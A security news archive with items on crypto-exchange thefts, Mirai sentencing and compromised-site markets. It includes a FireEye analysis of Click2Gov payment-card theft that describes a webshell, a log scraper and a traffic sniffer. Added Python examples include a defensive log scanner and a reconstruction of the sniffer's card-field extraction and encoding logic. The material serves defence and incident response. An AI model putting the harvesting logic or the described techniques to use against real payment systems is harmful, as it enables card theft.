Category Archives: Cybercrime

Security Affairs: Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange

Cybercriminals have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies from the Japanese digital currency exchange Zaif.

According to the Tech Bureau Corp., a Japanese cryptocurrency firm, hackers have compromised its Zaif exchange and have stolen 6.7 billion yen ($60 million) worth of cryptocurrencies, including Bitcoin, Monacoin, and Bitcoin Cash.

The stolen digital currencies included roughly 2.2 billion yen that belonged to Tech Bureau and 4.5 billion yen that belonged to its clients.

The hackers took control of the exchange for a couple of hours on Sept. 14 and illegally transferred coins from the “hot wallet” of the exchange to wallets under their control.

“Japanese cryptocurrency firm Tech Bureau Corp said about $60 million in digital currencies were stolen from its exchange, highlighting the industry’s vulnerability despite recent efforts by authorities to make it more secure.” Reuters reported.

Three days later, operators at the exchange noticed server problems and publicly disclosed the hack on Sept. 18.

Tech Bureau took the exchange offline and sold majority ownership to Fisco Ltd for a 5 billion yen ($44.59 million) investment that would be used to replace the digital currencies stolen from client accounts.

“Documents seen by Reuters on Thursday showed Japan’s Financial Services Agency would conduct emergency checks on cryptocurrency exchange operators’ management of customer assets, following the theft. FSA officials were not immediately available for comment.” Reuters continues.

This is the second hack suffered by a Japanese crypto exchange this year; in January, the Japan-based digital exchange Coincheck was hacked and crooks stole $530 million in digital coins.

Earlier this year, a problem at the Zaif exchange allowed some people to buy cryptocurrencies without paying.

Japan is considered a global leader in cryptocurrency technologies; Bitcoin has been usable for payments in the country since April 2017, and major retailers accept this kind of payment.

Experts believe that the cyber heist will affect the FSA’s ongoing regulatory review of the cryptocurrency industry.

Last year Japan became the first country to regulate cryptocurrency exchanges: they have to register with the FSA and are subject to reporting and other obligations.

In any case, the incidents demonstrate that the security of exchanges has to be improved.

Pierluigi Paganini

(Security Affairs – Zaif exchange, hacking)

The post Hackers stole $60 Million worth of cryptocurrencies from Japanese Zaif exchange appeared first on Security Affairs.



Why voice fraud rates continue to rise with no signs of slowing down

Pindrop released its annual report detailing developments in fraud, the future of voice and the impact to customer service across various industries. In the report, Pindrop reveals the rate of voice fraud climbed over 350 percent from 2013 through 2017, with no signs of slowing down. Additionally, between 2016 and 2017, overall voice channel fraud increased by 47 percent, or one in every 638 calls. The year-over-year increase can be attributed to several causes, including …

The post Why voice fraud rates continue to rise with no signs of slowing down appeared first on Help Net Security.

US authorities Have Pardoned Authors of Mirai Ransomware in Return For Government “Cooperation”

The authors of the Mirai botnet have been pardoned and have avoided jail since they have helped the FBI in

US authorities Have Pardoned Authors of Mirai Ransomware in Return For Government “Cooperation” on Latest Hacking News.

Mirai botnet masterminds helping FBI to avoid jail time

Mirai botnet creators avoid prison time by assisting FBI as part of their sentencing

Remember the three young hackers who were sentenced in December last year for creating and spreading Mirai botnet that took over about 500,000 IoT devices and caused a DDoS attack?

The U.S. Department of Justice (DOJ) on Tuesday sentenced all three men, Paras Jha, Josiah White, and Dalton Norman, all in their 20s, to just five years of probation—no prison time. The decision was announced after U.S. prosecutors said that the three men had provided “extensive” and “exceptional” assistance to the U.S. Federal Bureau of Investigation (FBI) in several cybersecurity matters.

The trio will also have to serve 2500 hours of community service and need to pay US$127,000 (A$175,000) in restitution each. Additionally, the trio voluntarily surrendered significant amounts of cryptocurrency seized during the investigation into their activities, the DOJ said.

“By working with the FBI, the defendants assisted in thwarting potentially devastating cyber attacks and developed concrete strategies for mitigating new attack methods,” US attorneys said in a motion filed Sept. 11. “The information provided by the defendants has been used by members of the cybersecurity community to safeguard US systems and the Internet as a whole.”

For those unaware, Jha, White and Norman had originally created the Mirai botnet to take down rival Minecraft servers with distributed denial-of-service (DDoS) attacks. The trio used the botnet for their own criminal activities and leased it to others. But after noticing its strength, they released Mirai into the wild on a hacker forum, the DoJ said. Since then, other criminal actors have used Mirai variants in a variety of other attacks.

As a result, the Mirai botnet was used in a massive cyberattack in October 2016 against DNS service Dyn, an internet company that directs traffic on the web, which interrupted access to dozens of websites across the United States and Europe including ones run by Twitter, PayPal Holdings, and Spotify.

The three also admitted to having developed a second piece of malware that attacked IoT devices such as wireless cameras, routers, and digital video recorders and joined them into a botnet. That botnet compromised over 100,000 devices in the U.S., and was used by the trio primarily in advertising fraud, including “clickfraud,” a type of Internet-based scheme that makes it appear that a real user has “clicked” on an advertisement for the purpose of artificially generating revenue.

“Cybercrime is a worldwide epidemic that reaches many Alaskans,” said U.S. Attorney Bryan Schroder. “The perpetrators count on being technologically one step ahead of law enforcement officials. The plea agreement with the young offenders, in this case, was a unique opportunity for law enforcement officers, and will give FBI investigators the knowledge and tools they need to stay ahead of cybercriminals around the world.”

“The sentences announced today would not have been possible without the cooperation of our partners in international law enforcement and the private sector,” said Special Agent in Charge of FBI’s Anchorage Field Office, Jeffery Peterson.

“The FBI is committed to strengthening those relationships and finding innovative ways to counter cybercrime. Cybercriminals often develop their technical skills at a young age. This case demonstrates our commitment to hold criminals accountable while encouraging offenders to choose a different path to apply their skills.”

Jha, White, and Norman who were behind the Mirai botnet had pleaded guilty last December and were able to stay out of jail by co-operating with the FBI on cybercrime and security matters.

The court’s documents state that the trio has cooperated with the FBI for more than a year and that they will continue to work with the FBI on cybercrime and cybersecurity matters.

The post Mirai botnet masterminds helping FBI to avoid jail time appeared first on TechWorm.

New Magecart victims ABS-CBN and Newegg are just the tip of the iceberg

With the Magecart attackers compromising web shops left and right, online shopping is becoming a risky proposition. After Ticketmaster, British Airways and Feedify, two new Magecart victims have been identified: the broadcasting giant ABS-CBN and online retailer Newegg. Compromised shops Security researcher Willem de Groot flagged the ABS-CBN compromise a few days ago and he believes the attackers added the payment card skimming script on or before August 16th. RiskIQ and Volexity researchers shared details …

The post New Magecart victims ABS-CBN and Newegg are just the tip of the iceberg appeared first on Help Net Security.

Manipulation tactics that you fall for in phishing attacks

It’s 6 p.m. on a Friday. Just as you finish packing up for the day, an email from your boss pops up on your phone asking why an urgent payment didn’t go out earlier in the week. He’s tied up in a business dinner, so he needs you to wire payment to a specific vendor immediately and send him a confirmation email here once you’ve done so. Eager to help (and get out of the …

The post Manipulation tactics that you fall for in phishing attacks appeared first on Help Net Security.

Security Affairs: Access to over 3,000 compromised sites sold on Russian black marketplace MagBo

Security experts at Flashpoint discovered access to over 3,000 compromised sites being sold on the Russian black marketplace MagBo.

A new report published by researchers at Flashpoint revealed that access to over 3,000 breached websites is being sold on an underground marketplace for Russian-speaking users.

“Access to approximately 3,000 breached websites has been discovered for sale on a Russian-speaking underground marketplace called MagBo. Access to some of the sites is selling for as low as 50 cents (USD).” reads the report published by Flashpoint.

The earliest advertisements for the MagBo black marketplace were posted in March to a top-tier Russian-language hacking and malware forum. According to the advertising, sellers are offering the following kinds of access to breached websites: PHP shell access, hosting control access, domain control access, File Transfer Protocol (FTP) access, Secure Socket Shell (SSH) access, admin panel access, and database or Structured Query Language (SQL) access.

Most of the compromised websites are e-commerce sites, but crooks also offered access to websites of organizations in healthcare, legal, education and insurance industries and belonging to government agencies.

According to the experts, most of the compromised servers are hosted by U.S., Russian, or German hosting services. The company reported its findings to law enforcement, which is notifying the victims.

[Image: MagBo compromised servers]

Experts found a dozen vendors on the MagBo black marketplace, and hundreds of buyers participate in auctions in order to gain access to breached sites, databases, and administrator panels.

Access to compromised websites is a precious commodity in the cybercrime underground; crooks can use it to carry out a broad range of illicit activities.

“Illicit access to compromised or backdoored sites and databases is used by criminals for a number of activities, ranging from spam campaigns, to fraud, or cryptocurrency mining.” continues the report.

“These compromises have also been used to gain access to corporate networks. This could potentially allow actors to access proprietary internal documents or resources, as well as entry points through which they can drop various malicious payloads. The types of vulnerabilities present and the ways in which they can be exploited depend on the threat actor’s specific capability, motivation, targeting, and goals.”

Sellers are also offering different privilege levels: in some cases they provide “full access permissions” to the compromised sites, while other levels are “abilities to edit content” and “add your content.”

The prices for compromised websites range from $0.50 USD up to $1,000 USD per access, depending on a website ranking listing various host parameters.

[Image: MagBo compromised servers prices]

High-value targets command higher prices, for example for injecting payment card sniffers, while lower-ranking sites are usually used for cryptocurrency mining or spam campaigns.

The sellers also offer stolen photocopies of national documents for identity fraud, breached payment wallet access, compromised social media accounts, and Bitcoin mixer or tumbler services.

Pierluigi Paganini

(Security Affairs – MagBo, Darkweb)

The post Access to over 3,000 compromised sites sold on Russian black marketplace MagBo appeared first on Security Affairs.



SecurityWeek RSS Feed: Click2Gov Attacks on U.S. Cities Attributed to Previously Unknown Group

A previously unknown financially motivated threat group is believed to be behind a series of attacks whose goal was to obtain payment card data from U.S. cities relying on Click2Gov software for utility bill payments.


A month of giveaway spam on Twitter

We’ve observed a low level spam campaign working its way through Twitter, with just under 2,000 posts visible on public search since September 1.

[Image: giveaway posts]

The posts promote what appears to be CBD oil. For those who don’t know (And I was one of them—still not sure if this oil is supposed to be inhaled or consumed, but anyway), CBD is short for Cannabidiol, which is a chemical found in cannabis thought to have pain-relieving properties. It is often distilled into oil that can be used in many different ways for various ailments.

The posts follow one of two formats. The first is a large image splash attached to each Tweet:

[Image: Twitter post with image]

It says:

Have you entered into the giveaway yet for a bottle of [product name]?

They are giving it away for FREE

Follow these simple steps:
Step 1: RE-TWEET this post!
Step 2: Click the “Link” below to get your FREE [product name] for the last step!

The second post format we’ve seen is just text with a referral link:

[Image: Twitter posts, text only]

In both cases, the Tweets lead the curious clicker to a site located at

cbdhive(dot)com

This website’s Whois data is listed as domains by proxy, and it offers an email sign up for users to be the “first to know” about…well, no idea. It doesn’t say. I assumed the product was some sort of energy boost tablet, or maybe some kind of juice, and only learned of the medicinal oil connection after several bouts of Googling. All the visitor knows at this point is he has to sign up for something via email.

[Image: front page of the site]

Once an email address has been handed over, the visitor will be taken to a second page that claims to offer various bundles depending on how many friends make use of the referral/sign-up links. The options available are sharing it via Facebook, Twitter, and email.

[Image: post sign-up page]

If you refer five friends, you get one month of free supplies. Ten friends, two months. If you can summon 50 friends, then they claim you’ll receive a full year’s supply.

On our sign-up page, we were told “one friends [sic] have joined…keep checking.”

I don’t know who that friend is, because I certainly didn’t invite anyone (much less have them join).

We haven’t seen any evidence of the posts being automated, so it’s likely people are firing them off manually in the hopes of a freebie or 12.

I can’t say we advise jumping on the free stuff bandwagon; it’s never actually certain if the people participating will receive their desired games, ringtones, or other gifts. In this case, there’s also zero information we can see on the site about what the product is, what it does, how you use it, or if it’s even allowed in whatever region you happen to live.

Factoring CBD into the picture further complicates the matter because CBD is only legal in certain regions (globally), and under certain conditions. For example, CBD is legal in all 50 US states if it’s derived from the hemp plant. But if derived from marijuana, it’s legal in only eight US states. If prescribed by a doctor, it’s legal in 46 states. That’s not confusing at all.

Same deal for shipping, come to think of it. Is it targeted to one area only? Is International shipping possible with CBD?

I have no idea, and most likely neither does anyone else firing the links everywhere.

Always be cautious around sets of identical posts promising you free gifts in return for performing specific tasks. Most of the time, you’re doing little more than acting as free brand promotion for someone else’s SEO team taking the day off. I’m all for boosting the brand and increasing the verticals, but that’s taking things a little too far.

The post A month of giveaway spam on Twitter appeared first on Malwarebytes Labs.

Click It Up: Targeting Local Government Payment Portals

FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. Click2Gov is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement confirming suspicious activity had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.

On June 15, 2018, Superion released a statement describing their proactive notification to affected customers, work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.

Mandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.

Attack Overview

The first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).

SJavaWebManage Webshell

It is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle WebLogic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the publicly available JavaServer Pages (JSP) webshell SJavaWebManage to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.


Figure 1: Sample SJavaWebManage interface

  • EnvsInfo: Displays information about the Java runtime, Tomcat version, and other information about the environment.
  • FileManager: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.
  • CMDS: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.
  • DBManage: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.

The differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.

The attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.

FIREALARM

Using interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.

FIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments: year, month, and day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If a log file exists, FIREALARM copies its MAC (Modified, Accessed, Created) times in order to later timestomp the file back to its original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:

  • medium.accountNumber
  • medium.cvv2
  • medium.expirationDate.year
  • medium.expirationDate.month
  • medium.firstName
  • medium.lastName
  • medium.middleInitial
  • medium.contact.address1
  • medium.contact.address2
  • medium.contact.city
  • medium.contact.state
  • medium.contact.zip.code

This data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\temp\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are replaced to the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.


Figure 2: FIREALARM workflow

  1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.
  2. Attacker launches cmd prompt via webshell.
  3. Attacker runs FIREALARM with parameters.
  4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps it with the original times.
  5. THN1080.tmp is deleted.
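Added example (written for this page, not FireEye's code and not part of the original post): a defender-side scan that turns the FIREALARM description into detection logic. It looks for the medium.* fields listed above in Click2Gov-style log lines, which reveals DEBUG-mode card logging whether or not anything has been harvested yet, reports account numbers masked to their last four digits, and flags a non-empty log made up solely of ERROR - lines, which is what FIREALARM leaves behind. The key=value line layout, the sample log lines and the test card number are constructed for this example; real Click2GovCX lines may need a different regex.

```python
import re
from dataclasses import dataclass, field

# Log keys FIREALARM harvests (taken from the write-up). Any of them appearing
# in a log means DEBUG logging has exposed card data, harvested or not.
SENSITIVE_KEYS = frozenset({
    "medium.accountNumber", "medium.cvv2", "medium.expirationDate.year",
    "medium.expirationDate.month", "medium.firstName", "medium.lastName",
    "medium.middleInitial", "medium.contact.address1", "medium.contact.address2",
    "medium.contact.city", "medium.contact.state", "medium.contact.zip.code",
})
# Assumed "key=value" layout for the DEBUG lines (constructed for this example;
# real Click2Gov lines may be laid out differently and the regex adjusted).
KV_RE = re.compile(r"(medium\.[A-Za-z0-9.]+)=([^\s,;]+)")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum, so that arbitrary long numbers are not reported as PANs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """A detection tool must never surface a full PAN; keep the last four only."""
    return "*" * (len(pan) - 4) + pan[-4:]


@dataclass
class ScanResult:
    exposed_fields: dict = field(default_factory=dict)  # key -> occurrences
    masked_pans: list = field(default_factory=list)
    line_count: int = 0
    error_only: bool = False


def scan_click2gov_log(lines):
    """Scan one log file's lines for exposed card fields and scrub residue."""
    res = ScanResult()
    content = [ln for ln in lines if ln.strip()]
    res.line_count = len(content)
    for line in content:
        for key, value in KV_RE.findall(line):
            if key in SENSITIVE_KEYS:
                res.exposed_fields[key] = res.exposed_fields.get(key, 0) + 1
            if (key == "medium.accountNumber" and value.isdigit()
                    and 13 <= len(value) <= 19 and luhn_ok(value)):
                res.masked_pans.append(mask_pan(value))
    # FIREALARM rewrites the log keeping only lines that contain "ERROR -",
    # so a non-empty log consisting of nothing but error lines deserves a look.
    res.error_only = bool(content) and all("ERROR -" in ln for ln in content)
    return res


def verdict(res: ScanResult) -> str:
    if res.exposed_fields:
        return "EXPOSED"            # DEBUG logging is writing card data
    if res.error_only:
        return "POSSIBLY_SCRUBBED"  # consistent with FIREALARM clean-up
    return "CLEAN"


# Constructed sample logs; 4111111111111111 is a well-known test card number.
SAMPLE_DEBUG_LOG = [
    "2018-09-01 10:15:02 DEBUG PaymentProcessor - medium.accountNumber=4111111111111111, medium.cvv2=123",
    "2018-09-01 10:15:02 DEBUG PaymentProcessor - medium.expirationDate.month=09, medium.expirationDate.year=2021",
    "2018-09-01 10:15:02 DEBUG PaymentProcessor - medium.firstName=Jane, medium.lastName=Doe",
    "2018-09-01 10:16:40 ERROR - gateway timeout",
]
SAMPLE_SCRUBBED_LOG = [
    "2018-09-01 10:16:40 ERROR - gateway timeout",
    "2018-09-01 11:02:11 ERROR - connection reset",
]

if __name__ == "__main__":
    for name, log in (("debug", SAMPLE_DEBUG_LOG), ("scrubbed", SAMPLE_SCRUBBED_LOG)):
        r = scan_click2gov_log(log)
        print(name, verdict(r), sorted(r.exposed_fields), r.masked_pans)
```

Run it over each Click2GovCX.logYYYY-MM-DD file. An EXPOSED result is a configuration problem to fix (disable DEBUG, purge the logs) even when no attacker is present, while POSSIBLY_SCRUBBED on its own is only a hint and should be weighed together with file timestamps and the webshell indicators described in the post.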

SPOTLIGHT

Later, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence on the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service. When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.

SPOTLIGHT accepts two command line arguments:

  • gplcsvc.exe -i  Creates a new service named gplcsvc with the display name Group Policy Service
  • gplcsvc.exe -u  Stops and deletes the service named gplcsvc

Upon installation, SPOTLIGHT will monitor two paths on the infected host every hour:

  1. C:\bea\c2gdomain\applications\Click2GovCX\scripts\validator.jsp
  2. C:\bea\c2gdomain\applications\ePortalLocalService\axis2-web\RightFrame.jsp

If either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.

Additionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on port 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs – the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occur, the internal buffer data is searched for the following tags:

  • <op:AccountNum>
  • <op:CSC>
  • <op:ExpDate>
  • <op:FirstName>
  • <op:LastName>
  • <op:MInitial>
  • <op:Street1>
  • <op:Street2>
  • <op:City>
  • <op:State>
  • <op:PostalCode>

The contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\windows\temp\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host’s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.


Figure 3: SPOTLIGHT workflow

  1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.
  2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.
  3. A user accesses Click2Gov module to make a payment.
  4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.
  5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.
  6. Attacker exfiltrates opt.log file.
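The harvesting and logging steps above, reconstructed as an added Python example (this is not SPOTLIGHT’s code, nor anything published by FireEye): one half reproduces the buffering rules and tag extraction on a constructed OnePointService POST, the other decodes a recovered opt.log into masked records for triage. The SOAP layout, the test card number, the order of fields inside each record, and the assumption that the triggering packet is itself part of the searched buffer are all assumptions of this example.

```python
import base64
import re
from typing import List, Optional

# Tags SPOTLIGHT looks for (order as listed in the report; the order of fields
# inside the written record is an assumption of this example).
SPOTLIGHT_TAGS = [
    "AccountNum", "CSC", "ExpDate", "FirstName", "LastName", "MInitial",
    "Street1", "Street2", "City", "State", "PostalCode",
]
BUFFER_LIMIT = 102399
TRIGGER_PREFIX = b"POST /OnePoint/services/OnePointService"


def extract_record(buffer: bytes) -> Optional[str]:
    """Pull the text between each <op:Tag>...</op:Tag> pair out of the buffered
    request and join the values with '|'. None if no tag is present."""
    text = buffer.decode("latin-1")
    values = []
    for tag in SPOTLIGHT_TAGS:
        m = re.search(rf"<op:{tag}>(.*?)</op:{tag}>", text, re.DOTALL)
        values.append(m.group(1).strip() if m else "")
    return "|".join(values) if any(values) else None


def encode_log_line(record: str) -> str:
    """One opt.log entry: the pipe-joined record, Base64 encoded."""
    return base64.b64encode(record.encode("latin-1")).decode("ascii")


class SpotlightCapture:
    """Approximation of the listener's buffering rules: skip payloads that start
    with 'GET /', accumulate everything else, and search the buffer once it
    exceeds BUFFER_LIMIT or a payload starts with TRIGGER_PREFIX. Treating the
    triggering packet as part of the searched buffer is an assumption here."""

    def __init__(self) -> None:
        self.buf = b""
        self.log: List[str] = []  # stands in for c:\windows\temp\opt.log

    def on_packet(self, payload: bytes) -> None:
        if payload.startswith(b"GET /"):
            return
        self.buf += payload
        if len(self.buf) > BUFFER_LIMIT or payload.startswith(TRIGGER_PREFIX):
            record = extract_record(self.buf)
            if record:
                self.log.append(encode_log_line(record))
            self.buf = b""


def mask_pan(pan: str) -> str:
    """Keep the BIN and last four digits, mask the rest."""
    if len(pan) < 10:
        return "*" * len(pan)
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def decode_opt_log(lines: List[str]) -> List[dict]:
    """Triage helper for a recovered opt.log: decode each line back into a
    record keyed by tag name, with the PAN and CSC masked so the result can be
    shared without re-exposing card data."""
    records = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        fields = base64.b64decode(line).decode("latin-1").split("|")
        fields += [""] * (len(SPOTLIGHT_TAGS) - len(fields))
        rec = dict(zip(SPOTLIGHT_TAGS, fields))
        rec["AccountNum"] = mask_pan(rec["AccountNum"])
        rec["CSC"] = "*" * len(rec["CSC"])
        records.append(rec)
    return records


# Constructed sample of a payment POST to the OnePoint service; the SOAP layout
# and the (well-known test) card number are made up for this example.
SAMPLE_POST = (
    b"POST /OnePoint/services/OnePointService HTTP/1.1\r\n"
    b"Host: click2gov.example.invalid\r\nContent-Type: text/xml\r\n\r\n"
    b"<soap:Envelope><soap:Body><op:Payment>"
    b"<op:AccountNum>4111111111111111</op:AccountNum><op:CSC>123</op:CSC>"
    b"<op:ExpDate>1222</op:ExpDate><op:FirstName>Jane</op:FirstName>"
    b"<op:LastName>Doe</op:LastName><op:MInitial>Q</op:MInitial>"
    b"<op:Street1>1 Main St</op:Street1><op:Street2></op:Street2>"
    b"<op:City>Springfield</op:City><op:State>IL</op:State>"
    b"<op:PostalCode>62701</op:PostalCode>"
    b"</op:Payment></soap:Body></soap:Envelope>"
)

if __name__ == "__main__":
    cap = SpotlightCapture()
    cap.on_packet(b"GET /Click2GovCX/index.jsp HTTP/1.1\r\n")  # never buffered
    cap.on_packet(SAMPLE_POST)
    for rec in decode_opt_log(cap.log):
        print(rec)
```

Decoding a recovered opt.log this way gives the responder a count of affected records and the full set of cardholder fields without anyone handling raw PANs; the masked output is what you would pass to the acquirer or a PFI.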

Attribution

Based on the available campaign information, the attacker does not align with any financially motivated threat group currently tracked by FireEye. The attacker’s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communication protocols demonstrates advanced knowledge of the Click2Gov application. Given the way underground forums and marketplaces function, it is possible that tool development was contracted to third parties and that remote access to compromised systems was obtained by one entity and sold to another. There is much left to be uncovered about this attacker.

While it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:

  • Ability to locate Click2Gov installations and identify exploitable vulnerabilities.
  • Ability to craft or reuse an exploit to penetrate the target organization’s network environment.
  • Basic JSP programming skills.
  • Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.
  • Proficient C/C++ programming skills.
  • General awareness of operational security.
  • Ability to monetize stolen payment card information.

Conclusion

In addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to watch the static content, and the code that generates dynamic content, on e-commerce webservers for unexpected modifications. Another best practice is to ensure that any web service accounts run with least privilege.

Although the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.

Detection

FireEye’s Adversary Pursuit Team from Technical Operations & Reverse Engineering – Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting nation-state or financially motivated intrusions that target organizations and involve interactive, focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and to quickly mitigate them across the FireEye enterprise.

FireEye detects the malware documented in this blog post as the following:

  • FE_Tool_Win32_FIREALARM_1
  • FE_Trojan_Win64_SPOTLIGHT_1
  • FE_Webshell_JSP_SJavaWebManage_1
  • Webshell.JSP.SJavaWebManage

Indicators of Compromise (MD5)

SJavaWebManage

  • 91eaca79943c972cb2ca7ee0e462922c
  • 80f8a487314a9573ab7f9cb232ab1642
  • cc155b8cd261a6ed33f264e710ce300e (Publicly available version)

FIREALARM

  • e2c2d8bad36ac3e446797c485ce8b394

SPOTLIGHT

  • d70068de37d39a7a01699c99cdb7fa2b
  • 1300d1f87b73d953e20e25fdf8373c85
  • 3bca4c659138e769157f49942824b61f

Bogus finance apps on Google Play target users worldwide

ESET researchers have discovered malicious apps impersonating various financial services and the Austrian cryptocurrency exchange Bitpanda on Google Play. The fake apps were uploaded to Google’s official app store in June 2018 and were collectively downloaded and installed over a thousand times. Upon launch, the apps would immediately ask the user to enter credit card details and/or login credentials for the targeted bank or service. The entered information would then be sent to the attacker’s server, and … More

The post Bogus finance apps on Google Play target users worldwide appeared first on Help Net Security.

Mirai authors avoid the jail by helping US authorities in other investigations

Three men who admitted to being the authors of the Mirai botnet avoided jail after helping the FBI in other cybercrime investigations.

I have been following the evolution of the Mirai botnet since MalwareMustDie shared with me the findings of its investigation in August 2016.

Now the three individuals who admitted to being the authors of the infamous botnet have avoided jail after helping the feds in other cybercrime investigations.

The three men, Josiah White (21) of Washington, Pennsylvania; Paras Jha (22), of Fanwood, New Jersey, and Dalton Norman (22), of Metairie, Louisiana, pleaded guilty in December 2017 to developing and running the dreaded Mirai botnet that was involved in several massive DDoS attacks.

The identification and conviction of the three men is the result of international cooperation between government agencies in the US, UK, Northern Ireland, and France, and private firms including Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

According to the plea agreements, White developed the Telnet scanner component used by Mirai, Jha created the botnet’s core infrastructure and the malware’s remote control features, while Norman developed new exploits.

Jha, who goes by the online moniker “Anna-senpai”, leaked the source code for the Mirai malware on a criminal forum, allowing other threat actors to use it and making attribution of the attacks harder.

Jha also pleaded guilty to carrying out multiple DDoS attacks against his alma mater Rutgers University between November 2014 and September 2016, before creating the Mirai botnet. According to the authorities, the three earned roughly $180,000 through their click fraud scheme.

The Mirai case was investigated by the FBI Field Office in Anchorage, and the Chief U.S. District Judge in Alaska sentenced the men.

